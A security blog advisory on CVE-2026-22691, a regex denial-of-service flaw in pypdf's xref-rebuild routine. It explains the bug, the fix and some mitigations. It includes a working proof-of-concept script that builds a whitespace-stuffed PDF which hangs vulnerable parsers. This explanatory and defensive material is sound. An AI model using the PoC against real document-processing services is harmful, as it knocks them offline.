CVE-2026-22691

The White Void: Choking pypdf with Nothingness

Alon Barad
Software Engineer

Jan 11, 2026 · 6 min read

Executive Summary (TL;DR)

pypdf tries too hard to be helpful. When it encounters a broken PDF index (xref), it scans the file to rebuild it. Prior to version 6.6.0, this scan used a regex that chokes on massive blocks of whitespace. An attacker can craft a 'broken' PDF with megabytes of empty space, causing the parser to hang indefinitely and consume 100% CPU.

A Denial of Service vulnerability in the pypdf library allows attackers to exhaust CPU resources by supplying malformed PDF files containing excessive whitespace. This occurs during the library's attempt to rebuild damaged cross-reference tables using inefficient regular expressions.

The Hook: When "Fixing It" Goes Wrong

PDFs are fragile beasts. Internally, they rely on a Cross-Reference Table (xref) that acts as a map, telling the reader the exact byte offset at which each object (images, text blocks, fonts) lives in the file. If this map is corrupted or missing, a strict PDF reader will usually just throw an error and give up.

But pypdf is not a quitter. In its default "non-strict" mode, it attempts to be the hero. If the startxref pointer is garbage, pypdf enters a recovery mode called _rebuild_xref_table. It rolls up its sleeves and decides to read the entire raw file, byte by byte, to find the objects itself and reconstruct the map.

Here lies the tragedy: the mechanism it used to scan for these objects was naively optimistic. It assumed that the space between objects would be reasonable. It didn't account for a malicious actor handing it a file that is 99% empty void and 1% content. This vulnerability is the classic tale of a fallback mechanism becoming the primary attack vector.

The Flaw: Death by Regular Expression

The root cause isn't memory corruption or a buffer overflow; it's algorithmic complexity, specifically a variant of ReDoS (Regular Expression Denial of Service). When pypdf attempts to find objects in the raw stream, it previously used Python's re module.

Here is the culprit regex that was running the show:

re.finditer(rb"[\r\n \t][ \t]*(\d+)[ \t]+(\d+)[ \t]+obj", f_)

Let's break down why this is dangerous. The regex looks for whitespace ([\r\n \t]), followed by optional whitespace ([ \t]*), followed by digits (the Object ID), more whitespace, digits (Generation ID), and finally the keyword obj.

If you feed the parser a file where an object definition is preceded by 50MB of spaces and tabs, the regex engine has to chew through all of that, repeatedly. While Python's re module is generally fast, finditer restarts a failed match attempt at nearly every position inside a whitespace run: each attempt lets [ \t]* greedily swallow the rest of the run, fails to find a digit, and then backtracks through everything it just swallowed. When a run is not terminated by a valid object header, that cost grows quadratically with the run's length. The CPU spins at 100%, tokenizing millions of void characters looking for a pattern that might not even be there.
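
You can watch this blowup without pypdf at all. The following standalone benchmark runs the same pattern over pure whitespace (the worst case, since no match ever succeeds); the sizes are kept deliberately small so the demo finishes, but each doubling roughly quadruples the runtime:

import re
import time

# The pre-6.6.0 pattern from _rebuild_xref_table
PATTERN = re.compile(rb"[\r\n \t][ \t]*(\d+)[ \t]+(\d+)[ \t]+obj")

# A whitespace run with nothing matchable after it forces a failed attempt
# at every position; each attempt scans and backtracks through the rest of
# the run before giving up, which is quadratic overall.
for n in (5_000, 10_000, 20_000):
    blob = b" " * n
    start = time.perf_counter()
    hits = list(PATTERN.finditer(blob))
    print(f"{n:>6} bytes of whitespace -> {len(hits)} matches in "
          f"{time.perf_counter() - start:.3f}s")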

The Code: The Smoking Gun

The fix provided by the maintainers in commit 294165726b646bb7799be1cc787f593f2fdbcf45 is a masterclass in "stop using regex for parsing binary formats."

The Vulnerable Code (Before):

The library relied on re.finditer to locate every instance of the obj definition. This is elegant to write but expensive to execute on untrusted input.

# old code inside _rebuild_xref_table
for match in re.finditer(rb"[\r\n \t][ \t]*(\d+)[ \t]+(\d+)[ \t]+obj", data):
    # ... logic to process match ...

The Fixed Code (After):

The patch completely rips out the regex engine. Instead, it implements a manual byte scanner, _find_pdf_objects. It searches specifically for the bytes b" obj" using the highly optimized data.find() method (which uses Boyer-Moore-style fast string search implemented in C), and then manually walks backward to verify the digits.

# new approach in version 6.6.0
i = -1
while True:
    # Fast C-level search for the keyword
    i = data.find(b" obj", i + 1)
    if i == -1:
        break

    # Manual backward scanning to find the Object ID and Generation ID
    # This avoids the overhead of the regex state machine entirely
    # ... logic to parse digits backwards ...

This change shifts the complexity from the regex engine's opaque handling of whitespace to a strictly linear scan that skips whitespace efficiently.
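
To make that new shape concrete, here is a minimal sketch of the backward-walking scan. This is not pypdf's exact implementation (names and edge-case handling are simplified), but it demonstrates the technique: let the C-level find() leap over the void, then verify the few bytes around each candidate by hand:

def find_objects(data: bytes):
    """Yield (object_id, generation, offset) for each 'N M obj' marker."""
    i = -1
    while True:
        i = data.find(b" obj", i + 1)
        if i == -1:
            return
        # Walk backward over the generation number.
        g = i
        while g > 0 and data[g - 1] in b"0123456789":
            g -= 1
        if g == i:  # no digits directly before " obj"
            continue
        # Walk backward over the whitespace separating the two numbers.
        n = g
        while n > 0 and data[n - 1] in b" \t":
            n -= 1
        if n == g:  # no separator: not a real object header
            continue
        # Walk backward over the object ID.
        s = n
        while s > 0 and data[s - 1] in b"0123456789":
            s -= 1
        if s == n:  # no object ID
            continue
        yield int(data[s:n]), int(data[g:i]), s

Against the 50MB PoC below, this is a single pass: find() skips the entire void in one C-level call, and the backward walk only touches the handful of bytes around each candidate.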

The Exploit: Constructing the Void

To exploit this, we don't need shellcode. We just need a text editor (or a Python script) and a lot of space bar hits. The goal is to force pypdf into the _rebuild_xref_table method and then trap it there.

The Recipe:

  1. Valid Header: Start with %PDF-1.4 so the library recognizes it.
  2. The Payload: Insert a valid object, but precede it with 10MB (or more) of spaces, tabs, and newlines.
  3. The Trigger: Corrupt the startxref at the end of the file. This tells pypdf: "Hey, the map is broken, please scan the file manually."

# Concept PoC Generator
header = b"%PDF-1.4\n"
# The trap: Massive whitespace before a valid object definition
payload = b" " * (1024 * 1024 * 50) + b"1 0 obj\n<< >>\nendobj\n"
# Corrupt EOF to trigger rebuild
trailer = b"\ntrailer\n<< /Root 1 0 R >>\nstartxref\n0\n%%EOF"
 
with open("dos.pdf", "wb") as f:
    f.write(header + payload + trailer)

When a vulnerable pypdf (default mode) opens this file, it sees the bad startxref, sighs, and starts scanning. It hits the 50MB wall of whitespace. Because of the regex inefficiencies, the process will hang, potentially for minutes or longer depending on the file size, causing a Denial of Service.
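
For completeness, the consumer side needs nothing exotic; the hang happens inside the constructor (strict defaults to False, so the automatic rebuild kicks in) before your code ever touches a page:

from pypdf import PdfReader

# On a vulnerable version, this call pegs a CPU core and does not return
# in any reasonable time.
reader = PdfReader("dos.pdf")
print(len(reader.pages))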

The Impact: Why Low CVSS is Deceptive

The CVSS score is 2.7 (Low). Do not let this fool you. CVSS scores often underestimate the impact of DoS in modern cloud architectures.

Imagine you have a document processing pipeline running on AWS Lambda or a Celery worker. A user uploads invoice.pdf (which is actually our dos.pdf).

  1. The Worker Stalls: The Python process hits 100% CPU and stays there.
  2. The Timeout: If you have a timeout of 30 seconds, the worker dies. If you don't (and many poorly configured containers don't), it runs until the heat death of the universe or your credit card limit.
  3. Thread Exhaustion: If this is a synchronous web server (like Gunicorn with sync workers), a few requests can tie up all available workers, rendering the entire application unresponsive to legitimate traffic.

This is a low-complexity, high-annoyance attack that effectively shuts down PDF ingestion pipelines.

The Mitigation: Hard Limits and Updates

The primary fix is straightforward: Update pypdf to version 6.6.0 or later. The shift from regex to manual parsing eliminates the performance cliff.

However, there are architectural mitigations you should apply regardless of the version:

  1. Strict Mode: If you control the input and expect valid PDFs, turn off the heroics. Initialize the reader with PdfReader(stream, strict=True). This disables the automatic repair functionality entirely. If the PDF is broken, it raises an exception immediately rather than trying to fix it and dying in the process.

  2. Resource Limits: The patch also introduced root_object_recovery_limit. Even with the fix, you should limit how much effort the parser spends trying to recover broken files.

  3. Timeouts: Never process file uploads without a hard timeout wrapper around the processing function; a sketch follows below. Assume every PDF is a bomb.
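
Here is a minimal sketch combining points 1 and 3, assuming you can afford a child process per document: strict mode disables the repair heroics, and running the parse out-of-process lets you kill it outright (a signal-based alarm in the same process cannot interrupt a CPU-bound parse mid-match). The helper parse_with_timeout is our name, not a pypdf API:

import multiprocessing

from pypdf import PdfReader

def _parse(path, conn):
    # Child process: if this hangs, the parent can terminate it outright.
    reader = PdfReader(path, strict=True)  # fail fast instead of repairing
    conn.send(len(reader.pages))

def parse_with_timeout(path, seconds=30):
    parent_conn, child_conn = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=_parse, args=(path, child_conn))
    proc.start()
    if parent_conn.poll(seconds):  # wait up to `seconds` for a result
        result = parent_conn.recv()
        proc.join()
        return result
    proc.terminate()  # hung (or crashed) worker: kill it, don't wait politely
    proc.join()
    raise TimeoutError(f"PDF processing exceeded {seconds}s: {path}")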

Technical Appendix

CVSS Score: 2.7 / 10
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
EPSS Probability: 0.04%

Affected Systems

pypdf < 6.6.0

Affected Versions Detail

Product: pypdf (py-pdf)
Affected Versions: < 6.6.0
Fixed Version: 6.6.0
Attribute             Detail
CWE ID                CWE-1333, Inefficient Regular Expression Complexity (ReDoS)
Attack Vector         Network (File Upload)
CVSS v4.0             2.7 (Low)
Impact                Denial of Service (DoS)
EPSS Score            0.00042 (Low Probability)
Vulnerable Component  PdfReader._rebuild_xref_table

Vulnerability Timeline

2026-01-09  Vendor releases fix in version 6.6.0
2026-01-10  CVE-2026-22691 published
2026-01-10  GHSA-4f6g-68pf-7vhv published
